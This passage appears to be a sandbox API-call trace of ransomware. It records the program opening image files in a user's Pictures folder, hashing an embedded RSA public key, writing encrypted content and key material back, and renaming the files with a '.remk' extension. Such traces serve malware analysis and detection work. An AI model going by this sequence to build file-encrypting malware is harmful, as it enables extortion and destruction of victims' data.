lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.640] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=60600) returned 1 [0236.641] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.643] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xec92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.643] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.645] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xecb8, lpOverlapped=0x0) returned 1 [0236.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.646] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.648] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.648] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.648] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.648] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.648] GetLastError () returned 0x0 [0236.648] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.648] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.648] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.648] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.648] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.649] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc870 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc828 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc810 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.650] GetCurrentThreadId () returned 0x314 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5eb0 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.651] GetCurrentThreadId () returned 0x314 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc870 [0236.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc888 [0236.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc8a0 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc840 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8a0 | out: hHeap=0x630000) returned 1 [0236.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ced90 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.656] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0xecb3, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0xecb3, lpOverlapped=0x0) returned 1 [0236.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.656] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xecb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.656] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.657] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.657] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.657] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.657] CloseHandle (hObject=0x640) returned 1 [0236.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x65dd10 [0236.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.659] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ayZ1BTswz7VJrGpFc2.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\ayz1btswz7vjrgpfc2.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ayZ1BTswz7VJrGpFc2.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\ayz1btswz7vjrgpfc2.gif.remk")) returned 1 [0236.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.663] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.664] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf8050, ftCreationTime.dwHighDateTime=0x1d5e720, ftLastAccessTime.dwLowDateTime=0xe6629bd0, ftLastAccessTime.dwHighDateTime=0x1d5d890, ftLastWriteTime.dwLowDateTime=0xe6629bd0, ftLastWriteTime.dwHighDateTime=0x1d5d890, nFileSizeHigh=0x0, nFileSizeLow=0x15c3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cO_.png", cAlternateFileName="")) returned 1 [0236.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0236.664] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\cO_.png") returned=".png" [0236.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\cO_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\co_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.666] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=89150) returned 1 [0236.666] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.669] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15c18, 